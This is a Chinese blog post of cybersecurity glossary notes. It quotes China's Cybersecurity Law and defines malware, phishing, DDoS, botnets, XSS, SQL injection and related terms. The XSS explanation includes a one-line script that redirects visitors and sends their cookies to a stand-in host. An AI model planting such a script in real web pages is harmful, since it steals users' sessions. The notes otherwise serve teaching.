络安全法:(2016年11月7日第十二届全国人民代表大会常务委员会第二十四次会议通过)
第二十一条 国家实行网络安全等级保护制度。网络运营者应当按照网络安全等级保护制度的要求,履行下列安全保护义务, 保障网络免受干扰、破坏或者未经授权的访问,防止网络数据泄露或者被窃取、篡改:
第三十一条 国家对公共通信和信息服务、能源、交通、水利、金融、公共服务、电子政务等重要行业和领域,以及其他一旦遭到破坏、丧失功能或者数据泄露,可能严重危害国家安全、国计民生、公共利益的关键信息基础设施,在网络安全等级保护制度的基础上,实行重点保护。关键信息基础设施的具体范围和安全保护办法由国务院制定。国家鼓励关键信息基础设施以外的网络运营者自愿参与关键信息基础设施保护体系。
第五十九条 网络运营者不履行本法第二十一条、第二十五条规定的网络安全保护义务的,由有关主管部门责令改正,给予警告;拒不改正或者导致危害网络安全等后果的,处一万元以上十万元以下罚款,对直接负责的主管人员处五千元以上五万元以下罚款。
病毒:
计算机病毒是一种计算机程序,它递归地、明确地复制自己或其演化体二进制文件病毒(virus)、引导区病毒(boot)、网络蠕虫(worm)、宏病毒(WM/W97M/XM/X97M/PPT/P97M/O97M)
木马:
木马指通过一段特定的程序(木马程序)来控制另一台计算机,木马通常有两个可执行程序:一个是客户端,即控制端,另一个是服务端,即被控制端。木马的设计者为了防止木马被发现,而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接,其控制端将享有服务端的大部分操作权限,例如给计算机增加口令,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等
网络钓鱼:
网络钓鱼攻击利用利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,受骗者往往会泄露自己的财务数据,如信用卡号、账户用户名、口令和社保编号等内容。诈骗者通常会将自己伪装成知名银行、在线零售商和信用卡公司等可信的品牌,在所有接触诈骗信息的用户中,有高达5%的人都会对这些骗局做出响应
DDOS:(Distributed Denial of Service):
分布式拒绝服务,攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或者多个目标发动消耗资源的攻击,从而成倍地提高拒绝服务攻击的威力
僵尸网络:
僵尸网络 Botnet 是指采用一种或多种传播手段,将大量主机感染bot程序(僵尸程序)病毒,从而在控制者和被感染主机之间所形成的一个可一对多控制的网络。
攻击者通过各种途径传播僵尸程序感染互联网上的大量主机,而被感染的主机将通过一个控制信道接收攻击者的指令,组成一个僵尸网络。之所以用僵尸网络这个名字,是为了更形象地让人们认识到这类危害的特点:众多的计算机在不知不觉中如同中国古老传说中的僵尸群一样被人驱赶和指挥着,成为被人利用的一种工具。
隐蔽通道:
1、基于内容,隐藏在正常报文中的特殊字符,空格、区别字符,http协议、DNS协议等等
2、基于时间,通过信息传送的时间长短,来向外传输信息,长的为0,短的为1
跨站脚本攻击:
攻击者在网站上挂上恶意脚本,当用户访问网站时,就会让恶意脚本感染到本地,最终导致恶意脚本在用户电脑上运行。
假设某BBS网站可以发贴
1、攻击者在发贴区域发布脚本,其中包含恶意代码,例如重定向到某个恶意网站
<script>document.localiton=’http://mysite.com/steal_cookie.php?’%2Bdocument.cookie</script>
2、浏览者正常浏览该页面,正常情况下应该看到发布的内容,但服务器在传给客户端的HTML页面中包含了这段代码,导致用户的页面被重定向到恶意网站
3、恶意网站可以收集访问它的用户的个人信息,例如通过cookie
网络蠕虫:
一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中)
SQL注入攻击:
在动态网页向后台提交SQL查询语句时,通过一些特殊的语句导致绕过认证或者获取到一些后天的数据信息
利用Web应用程序(网页程序)对用户的网页输入数据缺少必要的合法性判断的程序设计漏洞,攻击者将恶意的SQL命令注入到后台数据库的攻击方式
非法获得网站权限、网页篡改、网页挂马、窃取网站数据等
缓冲区溢出攻击:
以缓冲区溢出为攻击类型的安全漏洞是最为常见的一种形式,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击能使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权
密钥和密码的区别:
密钥是加密算法的参数、密码是你拥有密钥的凭据:
cookie:
Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息
Fuzzing测试:
人工构造错误输入,从而得到错误的输出
渗透测试:(pen test)
模拟攻击者的行为去寻找存在的漏洞,根据找到的漏洞进行整改
攻击和入侵的区别:
攻击就是直接对业务系统破坏,是正大光明的,但是入侵目的可能是破坏,也有可能是偷窃,是偷偷摸摸的进行
POC:
Proof ofConcept,中文意思是“观点证明”。这个短语会在漏洞报告中使用,漏洞报告中的POC则是一段说明或者一个攻击的样例,使得读者能够确认这个漏洞是真实存在的。
NOC、SOC、SIEM:
网管中心、安全运营中心、安全信息管理平台
事件和事故:
所有的事故都是事件,但不是所有的事件都是事故
需要进行应急响应的就是事故,不需要响应的就是事件
CDN:
CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术
网络安全规划思路:
1)起步阶段(动机:事件驱动 特征:模仿与响应)
2)成长阶段(动机:责任驱动 特征:符合和遵从)
3)精进阶段(动机:业务驱动 特征:保障与创新)
4)跃迁阶段(动机:利润驱动 特征:传播与赋能)
————————————————
版权声明:本文为优快云博主「Reggie615」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.youkuaiyun.com/jlj526/article/details/115220023